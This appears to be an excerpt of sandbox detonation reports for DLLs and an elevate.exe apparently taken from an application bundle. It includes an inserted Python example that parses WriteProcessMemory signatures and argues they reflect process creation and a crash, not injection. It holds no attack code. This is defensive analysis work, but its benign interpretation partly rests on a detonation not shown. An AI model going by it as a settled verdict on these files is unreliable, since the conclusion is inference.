2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240508-en

Max time kernel

118s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

55s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240221-en

Max time kernel

121s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2932 wrote to memory of 2112 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe
PID 2932 wrote to memory of 2112 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe
PID 2932 wrote to memory of 2112 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2932 -s 80

Network

N/A

Files

N/A
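The "Suspicious use of WriteProcessMemory" signatures in behavioral4 and behavioral20 look alike but describe different things once the WerFault command lines are tied back to the PIDs in the rows. The following Python is an added example, not part of the sandbox report or its tooling: it parses the signature rows and command lines copied from those two detonations (constructed input), works out which PID WerFault was invoked for, and checks whether the writer was the 64-bit rundll32 handing a 32-bit DLL off to its SysWOW64 twin, which is how rundll32 behaves on 64-bit Windows when the DLL on its command line is a 32-bit image.

```python
import re

# Constructed sample: signature rows and process command lines copied from the
# behavioral4 and behavioral20 detonations in this report.
SAMPLE_DETONATIONS = {
    "behavioral4": {
        "write_rows": [
            r"PID 4356 wrote to memory of 1676 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe",
        ] * 3,
        "cmdlines": [
            r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1",
            r"C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1676 -ip 1676",
            r"C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 628",
        ],
    },
    "behavioral20": {
        "write_rows": [
            r"PID 2932 wrote to memory of 2112 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe",
        ] * 3,
        "cmdlines": [
            r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1",
            r"C:\Windows\system32\WerFault.exe -u -p 2932 -s 80",
        ],
    },
}

# "PID <src> wrote to memory of <dst> <indicator> <process> <target>"
WRITE_ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) (\S+) (\S+) (\S+)$")
# "rundll32.exe <dll path>,<entry>"; an entry of "#N" is an export ordinal, not a name
RUNDLL_CMD = re.compile(r"^rundll32\.exe\s+(.+?),(\S+)$", re.IGNORECASE)
# WerFault's -p switch names the faulting process; -pss/-ip are other switches
WERFAULT_PID = re.compile(r"\bWerFault\.exe\b.*?\s-p\s+(\d+)", re.IGNORECASE)


def parse_write_row(row):
    """Return (src_pid, dst_pid, src_image, dst_image) from one signature row."""
    m = WRITE_ROW.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    src_pid, dst_pid, _indicator, src_image, dst_image = m.groups()
    return int(src_pid), int(dst_pid), src_image, dst_image


def werfault_target(cmdline):
    """PID of the process WerFault was started for, or None for other command lines."""
    m = WERFAULT_PID.search(cmdline)
    return int(m.group(1)) if m else None


def is_wow64_handoff(src_image, dst_image):
    """64-bit rundll32 writing into a freshly created 32-bit rundll32."""
    return (src_image.lower().endswith(r"\system32\rundll32.exe")
            and dst_image.lower().endswith(r"\syswow64\rundll32.exe"))


def analyze(detonation):
    pid_image = {}
    handoff = False
    for row in detonation["write_rows"]:
        src_pid, dst_pid, src_image, dst_image = parse_write_row(row)
        pid_image.setdefault(src_pid, src_image)
        pid_image.setdefault(dst_pid, dst_image)
        handoff = handoff or is_wow64_handoff(src_image, dst_image)

    loaded_dll = entry = crashed_pid = None
    for cmd in detonation["cmdlines"]:
        m = RUNDLL_CMD.match(cmd)
        if m and loaded_dll is None:
            loaded_dll, entry = m.group(1), m.group(2)
        pid = werfault_target(cmd)
        if pid is not None:
            crashed_pid = pid   # every WerFault instance in a task names the same PID
    return {
        "loaded_dll": loaded_dll,
        "entry": entry,
        "wow64_handoff": handoff,
        "crashed_pid": crashed_pid,
        "crashed_image": pid_image.get(crashed_pid),
    }


if __name__ == "__main__":
    for name, det in SAMPLE_DETONATIONS.items():
        r = analyze(det)
        print(name, "->", r)
```

For behavioral4 the writes from C:\Windows\system32\rundll32.exe into C:\Windows\SysWOW64\rundll32.exe are the 64-bit rundll32 starting its 32-bit counterpart for StdUtils.dll, and WerFault's -p 1676 names that 32-bit child as the process that crashed. For behavioral20 (Windows 7) the writes go into WerFault.exe itself and WerFault's -p 2932 points back at the writer, so the rundll32 that loaded vk_swiftshader.dll faulted and launched the error-reporting process. In both tasks the rundll32 command line is the harness exercising an extracted DLL by export ordinal 1; a parent writing into a child it has just created is expected for process creation and is not evidence of injection on its own.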

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

61s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1

Network

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win7-20240220-en

Max time kernel

120s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

48s

Max time network

57s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1

Network

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:56

Platform

win7-20240221-en

Max time kernel

120s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe

"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"

Network

N/A

Files

N/A